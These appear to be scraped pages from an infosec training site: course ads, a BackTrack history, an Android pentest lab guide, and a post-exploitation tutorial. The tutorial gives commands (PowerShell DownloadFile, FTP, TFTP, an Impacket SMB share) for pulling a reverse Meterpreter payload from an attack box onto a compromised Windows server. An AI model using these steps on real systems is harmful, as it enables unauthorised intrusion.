Offensive Cyber Expert Bundle

Do you really want to be the guy or girl that can just flat out hack! I’m talking about where it just doesn’t matter what’s in front of you – you know that you can figure it out.

It doesn’t matter if you are up against Linux, Windows Server 2016, SharePoint, web apps, or custom apps where you need to modify public exploit code to attack them.

If that’s what you want to be then this is the course bundle for you.

For today only you can purchase this entire class bundle for only $200 – just click the add to cart below:

$200.00Select options

 

linux

Being proficient in Linux in the InfoSec world today is an absolute must. This is the class that you absolutely want to take to not only get familiar with Linux but to learn how to use Linux to perform InfoSec tasks instead of just the basics of the operating system.

 

For today only you can purchase this entire class bundle for only $200 – just click the add to cart below:

$200.00Select options

 

powershell

Just like with Linux being proficient in PowerShell in the InfoSec world today is an absolute must because all of the Microsoft technologies today heavily utilize PowerShell. This is the class that you absolutely want to take to not only get familiar with PowerShell but to learn how to use PowerShell to perform InfoSec tasks.

 

For today only you can purchase this entire class bundle for only $200 – just click the add to cart below:

$200.00Select options

 

Offensive Cyber Operations
Offensive PowerShell with Cyber Range

This is the class where the rubber meets the road. This is the class where you put it all on the line and find out what works in the real world and what doesn’t. The Cyber Range is a full blown modern Windows environment (Windows Server 2016, Active Directory 2016, and SharePoint 2016 multi server farm)

 

For today only you can purchase this entire class bundle for only $200 – just click the add to cart below:

$200.00Select options

 

Exploit development

This is a fun class. 64bit exploit development. Learn how to write exploits, learn how to modify public exploit to suit your needs.

 

For today only you can purchase this entire class bundle for only $200 – just click the add to cart below:

$200.00Select options

 

 

Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:

https://infosecaddicts.com/unlimited-classes/

NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

Advanced Metasploit and Exploit Development Class

Advanced Metasploit and Exploit Development Class Bundle

I’ve updated both Metasploit and Exploit Development course. The Metasploit and Exploit Devlopment course is now heavily focused on auxilliary and post-module scripting and exploit course finally has all of the Windows XP removed. Each class is $150, or you can purchase them both as a bundle for $200.

 

Metasploit Next-Level
https://infosecaddicts.com/next-level-metasploit/
Take your Metasploit skills to the next level in this course that is designed to take a user from little to no experience with Metasploit to using all of the most advanced features of the tool has to offer.

This class is unique in that is starts with an introduction to Ruby scripting (for people with little programming experience), and is heavily focused on writing your own modules in Metasploit.

  • Ruby fundamentals
  • Writing simple ruby scripts for security tasks
  • Metasploit Structure and internals
  • Automating Metasploit with RC files
  • Writing auxilliary modules
  • The Writing of post modules
  • Writing exploits for Metasploit

This portion of the course bundle runs December 26th – 27th from 10am EST to 4pm EST each day.

Metasploit and Exploit Development

 

 

Exploit Development
http://infosecaddicts.com/exploit-development/
This workshop takes participants from relatively little exposure to the subject of exploit development. We begin the class with lower level, easy to grasp topics and then expand on those rapidly throughout the day.

For Students with a limited programming background and experience, worry not!  Templates are provided for each exploit with the intent being to cut down on the raw programming time in class, and instead focusing more on the methodology and mindset that goes into writing these different exploits.

Here are some of the topics to look forward to:

  • Stack Overflows
  • Abusing Structured Exception Handlers on Windows
  • Shellcoding Tricks (Negative jumps, egg hunters, fragmented shellcode)
  • Browser Exploits
  • PDF Exploits
  • ROP Exploits

This portion of the course bundle runs December 28th – 29th from 10am EST to 4pm EST each day.

You can register for this course bundle by filling out the form below

Advanced Metasploit & Exploit Development Class Bundle

  • $0.00

 

Metasploit and Exploit Development

Capture The Flag (CTF) competition

We will be running Capture The Flag (CTF) competitions a few times this year. Here are the particulars:

 

Location of game: Online

Game Type: Team Network/Web Application/Programming Attack competition

Game Play: Scoring via placing a team file (flag) in the target servers’ root (/root or c:\ directory)

Skill Level: Beginner/Intermediate

Number of players per team: Teams can be up to 15 players

 

This type of game is very well suited to college infosec groups, CCDC players, security enthusiasts, blue teams, pentest teams, and red teams. It’s a pure attack game. There is no defense necessary, nor system administration tasks to do. You connect to the VPN and have fun attacking the targets in the network and scoring points.

 

Date/Time:

CTF Prep Class September 9th from 10 am – 4 pm EST CTF prep class
CTF Prep Class September 16th from 10 am – 4 pm EST CTF prep class

The CTF Prep students will have access to the target lab network from September 8th – 22nd.

The actual CTF event will be on September 23rd from 12 noon to 8 pm EST.

Cost:

CTF Prep class cost is: $100
CTF Competition is: $50 per participant

Note: CTF Prep class participants acquire automatic registration for the CTF Competition

Signup now and let’s have some fun

Capture The Flag (CTF) Competition

$50.00Select options

 

 

Game Basics:

This will be a fun game. Each teams’ members will be given VPN access to the InfoSec Addicts target lab/CTF environment. Each team will be given a gpg encrypted file that will serve as the team’s flag. That flag file must be copied to the appropriate directory on the victim server to count as that server being compromised and to have points awarded to that team.

 

Game Rules:

– One can use Nessus and Metasploit, but beware bandwidth of penalties, so keep scanning to a minimum.
– Password brute-forcing is acceptable
– Using commercial pentesting tools is acceptable (ex: Core, Saint, Canvas)
– Scoring server will verify that target host has been successfully exploited
– Man-in-the-middle attacks of any kind are NOT acceptable
– Attacking other teams is NOT acceptable

 

Game Requirements:

Stable internet connection with a minimum of 1Mbit/sec that can connect to UDP 1194 (OpenVPN port)

No commercial VPN licenses required to participate

 

Game Prizes

1st Place – 3 FREE InfoSec Addicts classes per team participant
2nd Place – 2 FREE InfoSec Addicts classes per team participant
3rd Place – 1 FREE InfoSec Addicts classes per team participant

Signup now and let’s have some fun

Capture The Flag (CTF) Prep Class

$100.00Select options

 

Exploit Development

EXPLOIT DEVELOPMENT COURSE DESCRIPTION

This workshop takes participants from relatively little exposure to the subject of exploit development. We begin the class with lower level, easy to grasp topics and then expand on those rapidly throughout the day.

For Students with a limited programming background and experience, worry not!  Templates are provided for each exploit with the intent being to cut down on the raw programming time in class, and instead focusing more on the methodology and mindset that goes into writing these different exploits.

Here are some of the topics to look forward to:

  • Stack Overflows
  • Abusing Structured Exception Handlers on Windows
  • Shellcoding Tricks (Negative jumps, egghunters, fragmented shellcode)
  • Browser Exploits
  • PDF Exploits
  • ROP Exploits

WHO WOULD BENEFIT

Advanced IT Security Professionals (deep technical), IT Security Assessors (Penetration Testers), Application Developers, Intrusion Analysts

PREREQUISITES

Ethical Hacking experience

SCHEDULE

25th and 27th of June 2018 from 7pm to 9pm

Fill out this form to sign up for the class.

$200.00Select options

 

Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:

https://infosecaddicts.com/unlimited-classes/

 

NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

 

Backtrack

Background to Backtrack

You must have come across with the word Backtrack when it comes to hacking on Linux operating system. If you have never heard the word and further worked on its similar nowadays, then trust me you are missing a lot. But why do you think I am taking this so seriously?

The answer basically lies in two fancy and interesting notions: Digital Forensics and Penetration Testing. In case you do not know much about these two, I will explain them in a nutshell right over here. Digital forensics is the field of forensics science that specializes in the digital and investigation of material found in digital devices such as computer and mobile devices. On the other side, penetration testing is a simulation of an actual attack on the system to scan for its vulnerabilities, exploit them, and thereby gain access to all the data and features of this certain system.

Now, I can tell you the reason why you might not have heard of it. You didn’t start hacking until it was 2013 when the release of Kali Linux occurred as a rebuilt version of Backtrack. It was the Offensive Security team who were responsible for such a turning point action. At that time, it was rebuilt around the Debian distribution while it was originally based on the Knopper distribution. Both Knopper and Debian are Unix-like operating system distributions, yet each of them has their own unique features.

One good thing about it is the wide variety of users its development team was aiming to serve. As opposed to several other security software tools, it makes it very simple for beginner penetration testers to get much more closely into the field and gain more experience. Moreover, it’s community was a composition of individuals coming from diverse backgrounds. Skilled penetration testers, government entities, those who were motivated to learn and add in the field of information technology in general and computer security in particular, and those who were still new to the field were all covered under the umbrella of Backtrack and its community.

History

A good way to analyze a hacking platform is to first get in touch briefly with its history hoping to understand the background of its founders and their purposes behind this security tool. The story begins when WHAX and Auditor Security Collection both merged together after years of a severely competitive environment between both of them. They were both targeted for penetration testing purposes, resulting in a very effective tool in the same field name Backtrack when merged together.

WHAX was basically based on Slax distribution of Linux operating system for which Mati Aharoni was well known for at this time –He is now famous for creating Backtrack and Kali Linux as well of course–. Whoppix, the preceding version of WHAX, on the other hand, was based on Knoppix, which was referred to before in the article.

Alright, we now knew what WHAX was, what was Auditor Security Collection then? Well, its organizer Max Moser designed it to include more than three hundred tools in a user-friendly manner to assist in the penetration testing. It was, in fact, a live CD and it worked for Knoppix.

It transited through eleven main stages/releases until its last release. Each release lost all support from Backtrack Development team. Now there is no support for any versions since Kali Linux was its replacement.Backtrack

  1. Backtrack v.1.0 Beta was released in February 2006.
  2. In March of the same year. Backtrack v1.0 was first released
  3. The release of Backtrack v.2.0 occurred in 2007
  4. Backtrack v.3.0 then got released in 2008
  5. January 2010 then witnessed Backtrack v.4.0 final release
  6. Backtrack 4 R1 was released in May 2010
  7. In November 2010, Backtrack 4 R2 had its release
  8. May 2011 ushered the release of Backtrack 5
  9. August 2011 witnessed Backtrack 5 R1 released
  10. Backtrack 5 R2 had then its release in March 2012
  11. The release of the final version of Backtrack 5 R3 happened in August 2012.

What tools does Backtrack allow?

In order for us to see how effective and comprehensive Backtrack really is, we have to remind ourselves of the security tools combined ad supported By it. Before we go down explaining such tools, always remember a very important feature which grants it a great privilege over its companions if there is already any.

Backtrack allows installation from portable media such as CDs and USB flash disks, from which they are run life on a device. Similarly, Backtrack allows and supports installation on hard disks. Simply, one installs and boots it from a Live DVD or thumb-drive.

Now, it is time to expose ourselves to a great list of highly used security tools that Backtrack supports.

  • Metasploit which is a computer security project that shows the vulnerabilities and aids in Penetration Testing. Go and check the article titled “What is Metasploit” on infosecaddicts.com
  • Armitage which is the Metasploit’s graphical display tool, showing vulnerabilities in a clear manner and recommending actions and exploits as well.
  • The Windows log-in password cracker called Ophcrack
  • Hydra, which is another password cracking tool.
  • A famous network detector and packet sniffer called Kismet
  • A de-facto network packet sniffer and analyzer Wireshark.
  • Cisco OCS Mass Scanner, which is responsible for performing fast scanners, testing default telnet and enabling the passwords on routers of type Cisco.
  • Aircrack-ng, the magical WIFI network sniffer, and cracker
  • Another WIFI cracker named Gerix
  • All WIFI drivers which allow for monitor mode and packet injection meant to describe an interference with an already established network.
  • The incredible Nmap network scanner to get the hosts and services and create a map of the entire network
  • Browser Exploitation Framework (BeEF)
  • Several exploits are included and commonplace software like web browsers are also included.             Backtrack

To be honest, it is almost impossible to mention every single included tool and type it over here; it will get silly this way with no real benefit. Nonetheless, another means to display the other tools would be through elaborating on the categories into which they were divided for Backtrack. In fact, there were twelve categories turning into thirteen in the latest “Kali” version. While here I will refer to the thirteen of Kali, I will refer to the twelve later on in this article for the sake of comparability.

  1. Information Gathering such as DMitry
  2. Vulnerability Analysis like Inguma
  3. Tools for exploitation as Metasploit Framework
  4. Wireless Attacks like WIFI Honey
  5. Forensics such as Binwalk
  6. Web Applications like Skipfish
  7. Stress testing like FunkLoad
  8. Sniffing and Spoofing as Wireshark
  9. Password attacks like done by TrueCrack
  10. Maintaining Access such as Intersect
  11. Hardware hacking performed by dex2jar for instance
  12. Reverse Engineering for which we can use Apktool, for instance.
  13. Reporting tools as MagicTree

Getting Started with Backtrack

In this section, I will walk through the main features of it with screenshots attached for more illustrations. Although all of these screenshots are of the latest version Backtrack 5 R3, I prefer that if you do have the chance, use Kali Linux instead. My reason is that there is no support for it anymore.

  • The Backtrack Menu          Backtrack
  • Leave Menu                  Backtrack
  • Utilities Menu        Backtrack
  • The System Menu: it displays applications essential for a hackerBacktrack
  • The Internet MenuBacktrack
  • BackTrack: here I am mentioning the twelve categories as per the latest release of Backtrack

Backtrack

  1. Information Gathering
  2. Vulnerability Management
  3. Exploitation tools
  4. Privilege Escalation
  5. Maintaining Access
  6. Reverse Engineering
  7. RFID Tools
  8. Stress Testing
  9. Forensics
  10. Reporting Tools
  11. Services
  12. Miscellaneous
  • Exploitation Toolsbacktrack

References

https://en.m.wikipedia.org/wiki/BackTrack

https://www.backtrack-linux.org

https://null-byte.wonderhowto.com/how-to/hack-like-pro-getting-started-with-backtrack-your-new-hacking-system-0146889/

https://tools.kali.org/tools-listing

https://www.quora.com/What-is-backtrack

 

How Can a Penetration Testing Lab Be Built For Android?

Concepts we need to understand first of all: Penetration Testing

  • Penetration Testing:

It is highly probable that you have heard of penetration testing at some point while investigating the topic of computer security. Or maybe you have worked on penetration testing against a web application or another system or computer network.

So what is meant by penetration testing in the first place? Well, in fact, it refers to the process of searching for vulnerabilities in a specific system. In the meanwhile, the information of a targeted system is collected in order for a pen tester to grasp what entry points could be exploited. Then, an actual exploitation or sometimes a virtual one is carried out. Accordingly, conclusions are drawn out from such testing on vulnerabilities to report how much such system is secured.

Pen testers are usually referred to as white hat attackers since they try to break the system which is tested.

  • Android Platforms:

It comes as no surprise that every single person on earth is familiar with the word Android and realizes that it is an operating system for mobile devices in the first place.

However, what we are interested more in finding out the basics or fundamentals of such operating system; where does it come from and from which operating system was it originated? In fact, the Linux Kernel was where it all started for the sake of reaching a dependable operating system working well on mobile devices and tablets.

It has become now a very commonly effective operating system. There exists the Android Open Source Project (AOSP) which is basically an open project where several developers and geek guys cooperate to develop new features.

  • Virtual Machines:

One concept that any computer enthusiastic has got to know very well and understand its meaning is the notion of virtualization. Physical computers or servers are no longer appropriate for companies who struggle to find a place in their data centers to add new physical machines.

On the other hand, home users find it very hard to work on two, three, or even more operating systems and build connections with them. It is either one will have to buy several physicals, actual computers to install on whichever operating system desired. Or the other option is to have a comparably good computer with great Read-Only Memory (RAM) size and Hard Disk as well. Then, such resources shall be distributed amongst the “virtual” machines which are to exist on the same host “physical” machine.

An example of full virtualization virtual machines is Hypervisor. It is where the virtual machines are linked in a way or another direction towards the hardware of the computer device.

Whilst, operating-system-level virtualization is where virtual machines require an operating system to work on. Thereby, the virtual machines are linked to the hardware through such operating system in the middle. For instance, Virtual Box and Virtual Machine Workstation (VM Workstation) are two programs which work for this type of virtualization.

What types of software will be used for the process?
  1. Virtual Box:

It is for the virtualization purposes to construct the lab as explained before.

  1. Santoku OS:

It is an operating system which already offers preinstalled Software Development Kits (SDKs). It is actually specialized in the deeds of forensics investigations and penetration testing.

  1. GenyMotion:

It is very important for the sake of creating Android Virtual Device (AVD)

  1. InsecureBankv2:

It is an android app which is vulnerable. It will help us begin the actual penetration testing in our created lab.

A detailed guide towards penetration testing for Android

In order for us to accomplish our ultimate goal, we will have to walk through three main steps.

  1. Download Santoku OS:
    1. As mentioned before, such software is intended for penetration testing purposes since it has pre-installed SDKs.
    2. Plenty of forensics tools are offered by this operating system like firmware flashing tools for multiple vendors.
    3. App details could be also enumerated via various forensics scripts offered there.
  2. Install Virtual Box or VM Work Station:
    1. Throughout this tutorial, I will be using Virtual Box. However, you could also use VM Work Station for the same purpose.
    2. First, get Virtual Box opened and start a new machine which you shall create specifically for Santoku OS.                   Penetration Testing
    3. Choose the desired RAM size dedicated for this newly created virtual machine. While it is recommended that 786MB shall be the size, making it larger to reach 2GB, for example, is okay                                                                                                                          Penetration Testing
    4. The option VMDK (Virtual Machine Disk) is really the option which you should go forPenetration Testing
    5. Now, specify the desired hard disk size for needed purposes afterward.Penetration Testing
    6. Now, install Santoku on the assigned virtual machine. This could be simply done by a right click on this virtual machine. Then inside the option Storage, “empty disk” shall be chosen after the disk icon in front of the optical drive is clicked on. Santoku iso file should be selected for installation now                Penetration Testing
    7. Run the virtual machine, allowing Santoku to begin its boot menu and the option “Install – start the installer directly” should be chosen.Penetration Testing
    8. Walk through the installation process and choose your preferred language.Penetration TestingPenetration TestingPenetration TestingPenetration TestingPenetration TestingPenetration Testing
  1. Get Genymotion downloaded and installed:
    1. The Android operating system could be experienced through such software where application testing is aided by OpenGL hardware acceleration.
    2. Download Genymotion, and after it gets installed, browse into https://www.genymotion.com/account/create/
    3. A free account should be created there for verification and then log in the downloaded Gebymotion on the virtual machine.Penetration Testing
    4. Get the AVD created through clicking “Add” and select a preferred software version and brand type as per your desired task or preference.Penetration Testing
    5. Get your choices reviewed and confirmed thereafter. The virtual smart phone is created at this very point.Penetration Testing
    6. Data will start to get downloaded on the virtual devicePenetration Testing
    7. Choose the desired device to work on. You will have a bunch of options in case you added more than one device type. It will launch a similar thing to what is shown in the very following image.Penetration Testing
  1. Get Santoku connected to the virtual device now for the sake of using its SDKs afterward:
    1. Know which IP the virtual device has.Penetration Testing
    2. Get the command line opened in Santoku
    3. The following command should be typed adb connect <IP of Android Virtual Device>
    4. Make sure the device is connected through the command adb devicesPenetration Testing
    5. The virtual android device could be accessed for penetration now via opening a shell with a command adb shell

 

Reference

http://www.hackingarticles.in/build-android-penetration-testing-lab/

http://searchsoftwarequality.techtarget.com/definition/penetration-testing

https://en.wikipedia.org/wiki/Android_(operating_system)#Open-source_community

 

Transfer Files from Linux to Windows(After Exploit)

Sometimes we need to copy a payload or a tool from a Kali Linux attack box, an advanced Linux distribution used for penetration testing, into a compromised windows machine. But how could this be done? In order to elaborate on this idea, I will first start with an example in this regard.

A ColdFusion Server was found vulnerable, and a ColdFusion Markup (CFM) web shell payload was to be applied. Imagine you are able to hide or veil this payload, yet since you are using a Kali Linux attack box, you are really in need of a way to transfer a reverse meterpreter binary, for the sake of further control and access, from the Linux machine to the Windows Server running ColdFusion. How could this be possible?

I decided to write this article to make it easy for anyone facing the same issue. In the following lines, I will walk through 4 main methods to be utilized to transfer such files: Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), Trivial File Transfer Protocol (TFTP), and Server Message Block (SMB). Assume that for all the following methods, the copied files are called met8888.exe, and its location is:  /root/shells and “jarrieta” is the username used

HTTP

There are in fact two ways to manipulate using HTTP. It is either you have access to the desktop, and hence you will be able to download the files if you can open the browser, or you do not have access to the desktop and then you will use the command line. Two steps are to be followed in this process:

  1. Start the server:

The first step we need to make the files inside the current directory to become available and accessible over HTTP. To serve a file from Kali over HTTP, we can use Apache, which is fundamentally installed in Kali by default, or we can use a Python HTTP Server.

  • Using Apache:
    • Copy the file to /var/www/html
    • Make the Apache Service get enabledKali Linux
  • Using Python HTTP Server:
    • Type the following line of code inside the shell in order to open the Python web server directly in it:

python -m SimpleHTTPServer

  • Choose the port number; if you skip this stem, it will serve on port 8000 by default.Kali Linux

Press CTRL-C to kill the server when this step gets finished.

  1. Download the Files:

  • First Option: Desktop is accessible:
    • Visit the following link through the browser:Kali Linux

http://YOUR-KALI-IP/shell8888.exe ; i.e:

http://10.9.122.8/shell8888.exe

  • Download the files through the browser
  • Second Option: You cannot access Desktop (Using command Line):
    • Open the ordinary “Command Prompt”
    • Type the following command which utilizes the PowerShell’s WebClient object (:

(new-object System.Net.WebClient).DownloadFile(‘http://10.9.122.8/met8888.exe’,’C:\Users\jarrieta\Desktop\met888.exe’)

Kali Linux

FTP

This is considered another good method to go for since there is a built in FTP client inside Windows: C:\Windows\System32\ftp.exe

This method supports mutual file transfer; in other words, it allows its user to transfer files from Kali to Windows and vice versa. This aspect is not supported through HTTP. Two steps are to be followed in this process:

  1. Start the server:

In fact, there are three options to choose from when serving files through FTP:

  • First option: install vsftpd inside Kali, which will work as a full-featured FTP. You will have it still installed even after you transfer the files unless you uninstall it later on.
  • Second option: Using Python FTP server
    • Type the following command into the shell to install the FTP module:

apt-get install python-pyftpdlib

  • Now type:

python -m pyftpdlib

  • Choose the port number; if you skip this stem, it will serve on port 2121 by default.
  • Add the -w flag to allow the write access to an anonymous user.kali linux
  • Third Option: Using Metasploit: For more details on Metasploit, kindly refer to the article titled “What is Metasploit?
    • Go to the location:

auxiliary/server/ftp

  • Choose FTP to the directory inside which resides the files to be shared using the following line:

FTPROOT /root/shells

  • Run exploit
  • Type jobs -k <id>when you need to kill the serverKali Linux
  1. Download the Files:

This step is pretty straightforward since there is a built in FTP client inside Windows. We do it in the following steps:

  • Open the FTP prompt
  • Open an FTP connection:

ftp 10.9.122.8

  • Enter the user name “anonymous” and type any password for authentication stage
  • Download the files directly through the following commandsKali Linux
  • You can alternatively create a text file and name it “ftp_commands.txt” for example and include all the required answers inside it as text:
  • Kali Linux
  • Two line commands for doing all the aforementioned steps would be in this case to download the file:

ftp 10.9.122.8

-s:ftp_commands.txt

Kali Linux

Kali Linux

  • In order to get this file, there are two methods to select one of them. Both methods are illustrated in the following two pictures.

TFTP

New versions of Windows do not have tftp client installed, therefore it is required to enable it first using the following command:

pkgmgr /iu:”TFTP”

Once it gets installed or if it is already installed: it takes also two steps for the process.

  1. Start the server:

There are two options:

  • Using Kali: service atftpd start

Although it is simple, it takes a lot of time.

  • Using Metasploit:
    • Go to location:

auxiliary/server/tftp

  • Choose TFTP to the directory inside which resides the files to be shared using the following line:

TFTPROOT /root/shells

Kali Linux

  • Run exploit
  1. Download the Files:

  • Open the command prompt
  • Use the -i flag and then GET action:Kali Linux
  • Use the PUT action to extract filesKali Linux
  • Files will be saved by default in/tmp

SMB

This method is convenient since SMB is built into Windows, and no special commands are needed for the computer to understand Unified Naming Convention (UNC) paths. This way, you can use only one command to download and execute a payload. Two steps are required for the process:

  1. Start the server:

One way to do this is to install the Samba File server on Linux, which will take a lot of time which we are not really in need of. However, the simple method is using Python through the following steps:

  • Enter pywhich is a part of a project called Impacket
  • Specify a share name and the path you want to share:
  • For example, we can use the following command:

python smbserver.py ROPNOP /root/shells

Kali Linux

  • By default, the server will be up on port 445 and then any hashed challenge responses for any system connecting to the server will be printed out on the screen.
  • To confirm the past step in Linux we use smbclient, and in windows, we use the net view. The following two images illustrate this point.Kali Linux

Kali Linux

  1. Copy/ Execute the Files:

  • Open the command prompt
  • Treat the shared name ROPNOP as a local folder, and it is allowed to use commands like commands like dir, copy, move.Kali Linux
  • Use the command copyKali Linux
  • We could skip the last two steps, and just run the file inside the shared “local folder.”

Reference:

http://hackingandsecurity.blogspot.com.eg/2016/08/transferring-files-from-linux-to.html

Finally, take some time and look at my other article on Bypassing a Windows AppLocker.

Python For InfoSec Professionals

Python For InfoSec Professionals Night Class

This class aims at making students comfortable with using Python to perform simple IT Security tasks. Going beyond using other peoples’ tools in this field is the hardest step on the ladder to proficiency. This class will take you over that difficult step, enabling you to modify popular security tools or write your own. Most importantly, it is all taught in a simple manner that won’t put you to sleep like most programming courses.

 

Class Outline

Programming Concepts, Parsing Files, Logs, and PCAPs

  • Python Basics
  • Text File Parsing
  • CSV File Parsing
  • Log Parsing

python

 

  • PCAP Parsing
  • Port-Scanning
  • Bind/Reverse Shells
  • Scapy

 

  • SQL Injection
  • XSS
  • RFI/LFI

 

  • Memory Analysis
  • Identifying/Classifying/Analyzing Malware
  • Exploit Development with Python
  • Debugger automation

Please register to attend the class:

 

python

Students will receive

  • 30 hours of CPEs
  • Courseware slides
  • Lab Manual

Class Videos

Each class will be recorded and made available to the students via email. So you can keep up with the class even if you have to miss time or even a whole day.

Support

Each student will receive access to an InfoSec Addicts Group (infosecaddicts.com) for the class. Groups are where students can ask questions outside of the regular class hours, work with other students on lab exercises, homework, and challenges.

A class mentor is assigned to the InfoSec Addicts Group to answer questions (allow one day for responses).

Similarly, a Customer Relationship Manager is assigned to the class to manage questions and support issues.

Class Schedule

28th and 30th of May 2018 from 7pm to 9pm EST

 

Class Cost: $200

Fill out this form to sign up for the class.

$200.00Select options

 

 

Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:

https://infosecaddicts.com/unlimited-classes/

 

NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.